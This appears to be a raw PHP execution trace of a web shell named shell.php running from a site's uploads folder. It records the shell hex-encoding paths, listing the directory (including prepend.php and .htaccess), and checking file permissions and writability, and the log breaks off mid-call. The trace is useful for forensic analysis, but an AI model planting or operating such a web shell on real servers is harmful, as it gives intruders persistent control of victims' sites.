3 534 1 0.019397 481656
3 534 R 114
3 535 0 0.019409 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 535 1 0.019420 481688
3 535 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
2 529 1 0.019450 481616
2 529 R '766172'
1 A /var/www/html/uploads/shell.php 107 $i++
1 A /var/www/html/uploads/shell.php 101 $k = 2
1 A /var/www/html/uploads/shell.php 107 $i = 0
2 536 0 0.019491 481584 hex 1 /var/www/html/uploads/shell.php 108 1 ''
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
2 536 1 0.019520 481584
2 536 R ''
1 A /var/www/html/uploads/shell.php 107 $i++
2 537 0 0.019541 481584 hex 1 /var/www/html/uploads/shell.php 108 1 'var'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 538 0 0.019568 481584 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 538 1 0.019580 481624
3 538 R 118
3 539 0 0.019592 481584 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 539 1 0.019603 481656
3 539 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 540 0 0.019632 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 540 1 0.019644 481656
3 540 R 97
3 541 0 0.019656 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 541 1 0.019667 481688
3 541 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 542 0 0.019696 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 542 1 0.019707 481656
3 542 R 114
3 543 0 0.019719 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 543 1 0.019731 481688
3 543 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
2 537 1 0.019760 481616
2 537 R '766172'
1 A /var/www/html/uploads/shell.php 107 $i++
2 544 0 0.019782 481584 hex 1 /var/www/html/uploads/shell.php 108 1 'www'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 545 0 0.019810 481584 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 545 1 0.019822 481624
3 545 R 119
3 546 0 0.019834 481584 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 546 1 0.019845 481656
3 546 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 547 0 0.019874 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 547 1 0.019885 481656
3 547 R 119
3 548 0 0.019897 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 548 1 0.019908 481688
3 548 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 549 0 0.019937 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 549 1 0.019948 481656
3 549 R 119
3 550 0 0.019960 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 550 1 0.019971 481688
3 550 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
2 544 1 0.020000 481616
2 544 R '777777'
1 A /var/www/html/uploads/shell.php 107 $i++
1 A /var/www/html/uploads/shell.php 101 $k = 3
1 A /var/www/html/uploads/shell.php 107 $i = 0
2 551 0 0.020041 481584 hex 1 /var/www/html/uploads/shell.php 108 1 ''
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
2 551 1 0.020074 481584
2 551 R ''
1 A /var/www/html/uploads/shell.php 107 $i++
2 552 0 0.020095 481584 hex 1 /var/www/html/uploads/shell.php 108 1 'var'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 553 0 0.020123 481584 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 553 1 0.020135 481624
3 553 R 118
3 554 0 0.020147 481584 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 554 1 0.020159 481656
3 554 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 555 0 0.020188 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 555 1 0.020199 481656
3 555 R 97
3 556 0 0.020211 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 556 1 0.020223 481688
3 556 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 557 0 0.020251 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 557 1 0.020263 481656
3 557 R 114
3 558 0 0.020275 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 558 1 0.020286 481688
3 558 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
2 552 1 0.020315 481616
2 552 R '766172'
1 A /var/www/html/uploads/shell.php 107 $i++
2 559 0 0.020337 481584 hex 1 /var/www/html/uploads/shell.php 108 1 'www'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 560 0 0.020366 481584 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 560 1 0.020377 481624
3 560 R 119
3 561 0 0.020389 481584 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 561 1 0.020400 481656
3 561 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 562 0 0.020429 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 562 1 0.020440 481656
3 562 R 119
3 563 0 0.020452 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 563 1 0.020463 481688
3 563 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 564 0 0.020492 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 564 1 0.020503 481656
3 564 R 119
3 565 0 0.020515 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 565 1 0.020526 481688
3 565 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
2 559 1 0.020554 481616
2 559 R '777777'
1 A /var/www/html/uploads/shell.php 107 $i++
2 566 0 0.020575 481584 hex 1 /var/www/html/uploads/shell.php 108 1 'html'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 567 0 0.020605 481584 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 567 1 0.020616 481624
3 567 R 104
3 568 0 0.020628 481584 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 568 1 0.020639 481656
3 568 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 569 0 0.020669 481616 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 569 1 0.020680 481656
3 569 R 116
3 570 0 0.020692 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 570 1 0.020703 481688
3 570 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 571 0 0.020732 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 571 1 0.020744 481656
3 571 R 109
3 572 0 0.020756 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 572 1 0.020767 481688
3 572 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 573 0 0.020800 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 573 1 0.020811 481656
3 573 R 108
3 574 0 0.020823 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 574 1 0.020834 481688
3 574 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
2 566 1 0.020863 481624
2 566 R '68746d6c'
1 A /var/www/html/uploads/shell.php 107 $i++
1 A /var/www/html/uploads/shell.php 101 $k = 4
1 A /var/www/html/uploads/shell.php 107 $i = 0
2 575 0 0.020904 481584 hex 1 /var/www/html/uploads/shell.php 108 1 ''
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
2 575 1 0.020933 481584
2 575 R ''
1 A /var/www/html/uploads/shell.php 107 $i++
2 576 0 0.020954 481584 hex 1 /var/www/html/uploads/shell.php 108 1 'var'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 577 0 0.020982 481584 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 577 1 0.020993 481624
3 577 R 118
3 578 0 0.021005 481584 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 578 1 0.021017 481656
3 578 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 579 0 0.021046 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 579 1 0.021057 481656
3 579 R 97
3 580 0 0.021069 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 580 1 0.021081 481688
3 580 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 581 0 0.021110 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 581 1 0.021122 481656
3 581 R 114
3 582 0 0.021134 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 582 1 0.021145 481688
3 582 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
2 576 1 0.021174 481616
2 576 R '766172'
1 A /var/www/html/uploads/shell.php 107 $i++
2 583 0 0.021195 481584 hex 1 /var/www/html/uploads/shell.php 108 1 'www'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 584 0 0.021224 481584 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 584 1 0.021235 481624
3 584 R 119
3 585 0 0.021246 481584 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 585 1 0.021258 481656
3 585 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 586 0 0.021286 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 586 1 0.021297 481656
3 586 R 119
3 587 0 0.021309 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 587 1 0.021349 481688
3 587 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 588 0 0.021380 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 588 1 0.021391 481656
3 588 R 119
3 589 0 0.021403 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 589 1 0.021414 481688
3 589 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
2 583 1 0.021443 481616
2 583 R '777777'
1 A /var/www/html/uploads/shell.php 107 $i++
2 590 0 0.021464 481584 hex 1 /var/www/html/uploads/shell.php 108 1 'html'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 591 0 0.021494 481584 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 591 1 0.021505 481624
3 591 R 104
3 592 0 0.021517 481584 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 592 1 0.021532 481656
3 592 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 593 0 0.021561 481616 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 593 1 0.021572 481656
3 593 R 116
3 594 0 0.021585 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 594 1 0.021596 481688
3 594 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 595 0 0.021625 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 595 1 0.021636 481656
3 595 R 109
3 596 0 0.021648 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 596 1 0.021659 481688
3 596 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 597 0 0.021687 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 597 1 0.021699 481656
3 597 R 108
3 598 0 0.021711 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 598 1 0.021722 481688
3 598 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
2 590 1 0.021751 481624
2 590 R '68746d6c'
1 A /var/www/html/uploads/shell.php 107 $i++
2 599 0 0.021773 481584 hex 1 /var/www/html/uploads/shell.php 108 1 'uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 600 0 0.021803 481584 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 600 1 0.021814 481624
3 600 R 117
3 601 0 0.021826 481584 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 601 1 0.021837 481656
3 601 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 602 0 0.021866 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 602 1 0.021877 481656
3 602 R 112
3 603 0 0.021889 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 603 1 0.021900 481688
3 603 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 604 0 0.021929 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 604 1 0.021940 481656
3 604 R 108
3 605 0 0.021951 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 605 1 0.021962 481688
3 605 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 606 0 0.021991 481616 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 606 1 0.022001 481656
3 606 R 111
3 607 0 0.022013 481616 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 607 1 0.022024 481688
3 607 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 608 0 0.022053 481624 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 608 1 0.022064 481664
3 608 R 97
3 609 0 0.022076 481624 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 609 1 0.022087 481696
3 609 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 610 0 0.022116 481624 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 610 1 0.022127 481664
3 610 R 100
3 611 0 0.022138 481624 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 611 1 0.022149 481696
3 611 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 612 0 0.022178 481624 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 612 1 0.022189 481664
3 612 R 115
3 613 0 0.022201 481624 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 613 1 0.022211 481696
3 613 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
2 599 1 0.022243 481624
2 599 R '75706c6f616473'
1 A /var/www/html/uploads/shell.php 107 $i++
2 614 0 0.022268 481584 scandir 0 /var/www/html/uploads/shell.php 118 1 '/var/www/html/uploads'
2 614 1 0.022313 482208
2 614 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'shell.php']
2 615 0 0.022335 482176 array_diff 0 /var/www/html/uploads/shell.php 118 2 [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'shell.php'] [0 => '.', 1 => '..']
2 615 1 0.022356 482616
2 615 R [2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'shell.php']
1 A /var/www/html/uploads/shell.php 118 $scD = [2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'shell.php']
2 616 0 0.022390 482168 is_dir 0 /var/www/html/uploads/shell.php 120 1 '/var/www/html/uploads/.htaccess'
2 616 1 0.022408 482240
2 616 R FALSE
2 617 0 0.022422 482200 is_dir 0 /var/www/html/uploads/shell.php 120 1 '/var/www/html/uploads/data'
2 617 1 0.022437 482240
2 617 R TRUE
2 618 0 0.022451 482200 hex 1 /var/www/html/uploads/shell.php 121 1 '/var/www/html/uploads/data'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 619 0 0.022482 482200 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 619 1 0.022493 482240
3 619 R 47
3 620 0 0.022505 482200 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 620 1 0.022517 482272
3 620 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 621 0 0.022547 482232 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 621 1 0.022559 482272
3 621 R 118
3 622 0 0.022571 482232 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 622 1 0.022582 482304
3 622 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 623 0 0.022612 482232 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 623 1 0.022623 482272
3 623 R 97
3 624 0 0.022636 482232 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 624 1 0.022647 482304
3 624 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 625 0 0.022676 482232 ord 0 /var/www/html/uploads/shell.php 19 1 'r'
3 625 1 0.022688 482272
3 625 R 114
3 626 0 0.022700 482232 dechex 0 /var/www/html/uploads/shell.php 19 1 114
3 626 1 0.022711 482304
3 626 R '72'
2 A /var/www/html/uploads/shell.php 19 $r .= '72'
2 A /var/www/html/uploads/shell.php 18 $i++
3 627 0 0.022740 482240 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 627 1 0.022752 482280
3 627 R 47
3 628 0 0.022764 482240 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 628 1 0.022777 482312
3 628 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 629 0 0.022807 482240 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 629 1 0.022818 482280
3 629 R 119
3 630 0 0.022832 482240 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 630 1 0.022844 482312
3 630 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 631 0 0.022875 482240 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 631 1 0.022886 482280
3 631 R 119
3 632 0 0.022898 482240 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 632 1 0.022909 482312
3 632 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 633 0 0.022938 482240 ord 0 /var/www/html/uploads/shell.php 19 1 'w'
3 633 1 0.022949 482280
3 633 R 119
3 634 0 0.022961 482240 dechex 0 /var/www/html/uploads/shell.php 19 1 119
3 634 1 0.022971 482312
3 634 R '77'
2 A /var/www/html/uploads/shell.php 19 $r .= '77'
2 A /var/www/html/uploads/shell.php 18 $i++
3 635 0 0.023000 482248 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 635 1 0.023017 482288
3 635 R 47
3 636 0 0.023030 482248 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 636 1 0.023041 482320
3 636 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 637 0 0.023069 482248 ord 0 /var/www/html/uploads/shell.php 19 1 'h'
3 637 1 0.023080 482288
3 637 R 104
3 638 0 0.023092 482248 dechex 0 /var/www/html/uploads/shell.php 19 1 104
3 638 1 0.023105 482320
3 638 R '68'
2 A /var/www/html/uploads/shell.php 19 $r .= '68'
2 A /var/www/html/uploads/shell.php 18 $i++
3 639 0 0.023136 482248 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 639 1 0.023147 482288
3 639 R 116
3 640 0 0.023159 482248 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 640 1 0.023170 482320
3 640 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 641 0 0.023199 482248 ord 0 /var/www/html/uploads/shell.php 19 1 'm'
3 641 1 0.023210 482288
3 641 R 109
3 642 0 0.023221 482248 dechex 0 /var/www/html/uploads/shell.php 19 1 109
3 642 1 0.023232 482320
3 642 R '6d'
2 A /var/www/html/uploads/shell.php 19 $r .= '6d'
2 A /var/www/html/uploads/shell.php 18 $i++
3 643 0 0.023266 482256 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 643 1 0.023277 482296
3 643 R 108
3 644 0 0.023289 482256 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 644 1 0.023300 482328
3 644 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 645 0 0.023329 482256 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 645 1 0.023340 482296
3 645 R 47
3 646 0 0.023352 482256 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 646 1 0.023365 482328
3 646 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 647 0 0.023395 482256 ord 0 /var/www/html/uploads/shell.php 19 1 'u'
3 647 1 0.023407 482296
3 647 R 117
3 648 0 0.023419 482256 dechex 0 /var/www/html/uploads/shell.php 19 1 117
3 648 1 0.023430 482328
3 648 R '75'
2 A /var/www/html/uploads/shell.php 19 $r .= '75'
2 A /var/www/html/uploads/shell.php 18 $i++
3 649 0 0.023460 482256 ord 0 /var/www/html/uploads/shell.php 19 1 'p'
3 649 1 0.023471 482296
3 649 R 112
3 650 0 0.023483 482256 dechex 0 /var/www/html/uploads/shell.php 19 1 112
3 650 1 0.023494 482328
3 650 R '70'
2 A /var/www/html/uploads/shell.php 19 $r .= '70'
2 A /var/www/html/uploads/shell.php 18 $i++
3 651 0 0.023523 482264 ord 0 /var/www/html/uploads/shell.php 19 1 'l'
3 651 1 0.023534 482304
3 651 R 108
3 652 0 0.023546 482264 dechex 0 /var/www/html/uploads/shell.php 19 1 108
3 652 1 0.023557 482336
3 652 R '6c'
2 A /var/www/html/uploads/shell.php 19 $r .= '6c'
2 A /var/www/html/uploads/shell.php 18 $i++
3 653 0 0.023585 482264 ord 0 /var/www/html/uploads/shell.php 19 1 'o'
3 653 1 0.023596 482304
3 653 R 111
3 654 0 0.023608 482264 dechex 0 /var/www/html/uploads/shell.php 19 1 111
3 654 1 0.023619 482336
3 654 R '6f'
2 A /var/www/html/uploads/shell.php 19 $r .= '6f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 655 0 0.023648 482264 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 655 1 0.023659 482304
3 655 R 97
3 656 0 0.023671 482264 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 656 1 0.023682 482336
3 656 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 657 0 0.023710 482264 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 657 1 0.023722 482304
3 657 R 100
3 658 0 0.023734 482264 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 658 1 0.023748 482336
3 658 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 659 0 0.023777 482280 ord 0 /var/www/html/uploads/shell.php 19 1 's'
3 659 1 0.023788 482320
3 659 R 115
3 660 0 0.023801 482280 dechex 0 /var/www/html/uploads/shell.php 19 1 115
3 660 1 0.023812 482352
3 660 R '73'
2 A /var/www/html/uploads/shell.php 19 $r .= '73'
2 A /var/www/html/uploads/shell.php 18 $i++
3 661 0 0.023840 482280 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 661 1 0.023851 482320
3 661 R 47
3 662 0 0.023863 482280 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 662 1 0.023874 482352
3 662 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 663 0 0.023903 482280 ord 0 /var/www/html/uploads/shell.php 19 1 'd'
3 663 1 0.023914 482320
3 663 R 100
3 664 0 0.023926 482280 dechex 0 /var/www/html/uploads/shell.php 19 1 100
3 664 1 0.023937 482352
3 664 R '64'
2 A /var/www/html/uploads/shell.php 19 $r .= '64'
2 A /var/www/html/uploads/shell.php 18 $i++
3 665 0 0.023965 482280 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 665 1 0.023976 482320
3 665 R 97
3 666 0 0.023988 482280 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 666 1 0.023999 482352
3 666 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
3 667 0 0.024028 482280 ord 0 /var/www/html/uploads/shell.php 19 1 't'
3 667 1 0.024039 482320
3 667 R 116
3 668 0 0.024051 482280 dechex 0 /var/www/html/uploads/shell.php 19 1 116
3 668 1 0.024062 482352
3 668 R '74'
2 A /var/www/html/uploads/shell.php 19 $r .= '74'
2 A /var/www/html/uploads/shell.php 18 $i++
3 669 0 0.024090 482280 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 669 1 0.024101 482320
3 669 R 97
3 670 0 0.024112 482280 dechex 0 /var/www/html/uploads/shell.php 19 1 97
3 670 1 0.024123 482352
3 670 R '61'
2 A /var/www/html/uploads/shell.php 19 $r .= '61'
2 A /var/www/html/uploads/shell.php 18 $i++
2 618 1 0.024152 482280
2 618 R '2f7661722f7777772f68746d6c2f75706c6f6164732f64617461'
2 671 0 0.024170 482392 filemtime 0 /var/www/html/uploads/shell.php 121 1 '/var/www/html/uploads/data'
2 671 1 0.024183 482432
2 671 R 1676261585
2 672 0 0.024196 482336 date 0 /var/www/html/uploads/shell.php 121 2 'Y-m-d H:i' 1676261585
2 672 1 0.024266 484728
2 672 R '2023-02-12 23:13'
2 673 0 0.024287 484584 is_writable 0 /var/www/html/uploads/shell.php 121 1 '/var/www/html/uploads/data'
2 673 1 0.024306 484624
2 673 R TRUE
2 674 0 0.024321 484584 perms 1 /var/www/html/uploads/shell.php 121 1 '/var/www/html/uploads/data'
3 675 0 0.024334 484584 fileperms 0 /var/www/html/uploads/shell.php 32 1 '/var/www/html/uploads/data'
3 675 1 0.024346 484624
3 675 R 16895
2 A /var/www/html/uploads/shell.php 32 $p = 16895
2 A /var/www/html/uploads/shell.php 42 $i = 'd'
2 A /var/www/html/uploads/shell.php 50 $i .= 'r'
2 A /var/www/html/uploads/shell.php 51 $i .= 'w'
2 A /var/www/html/uploads/shell.php 52 $i .= 'x'
2 A /var/www/html/uploads/shell.php 53 $i .= 'r'
2 A /var/www/html/uploads/shell.php 54 $i .= 'w'
2 A /var/www/html/uploads/shell.php 55 $i .= 'x'
2 A /var/www/html/uploads/shell.php 56 $i .= 'r'
2 A /var/www/html/uploads/shell.php 57 $i .= 'w'
2 A /var/www/html/uploads/shell.php 58 $i .= 'x'
2 674 1 0.024457 484624
2 674 R 'drwxrwxrwx'
2 676 0 0.024472 484528 hex 1 /var/www/html/uploads/shell.php 121 1 '/var/www/html/uploads'
2 A /var/www/html/uploads/shell.php 17 $r = ''
2 A /var/www/html/uploads/shell.php 18 $i = 0
3 677 0 0.024502 484528 ord 0 /var/www/html/uploads/shell.php 19 1 '/'
3 677 1 0.024520 484568
3 677 R 47
3 678 0 0.024532 484528 dechex 0 /var/www/html/uploads/shell.php 19 1 47
3 678 1 0.024544 484600
3 678 R '2f'
2 A /var/www/html/uploads/shell.php 19 $r .= '2f'
2 A /var/www/html/uploads/shell.php 18 $i++
3 679 0 0.024575 484560 ord 0 /var/www/html/uploads/shell.php 19 1 'v'
3 679 1 0.024587 484600
3 679 R 118
3 680 0 0.024599 484560 dechex 0 /var/www/html/uploads/shell.php 19 1 118
3 680 1 0.024611 484632
3 680 R '76'
2 A /var/www/html/uploads/shell.php 19 $r .= '76'
2 A /var/www/html/uploads/shell.php 18 $i++
3 681 0 0.024640 484560 ord 0 /var/www/html/uploads/shell.php 19 1 'a'
3 681 1 0.024652 484600
3 681 R 97
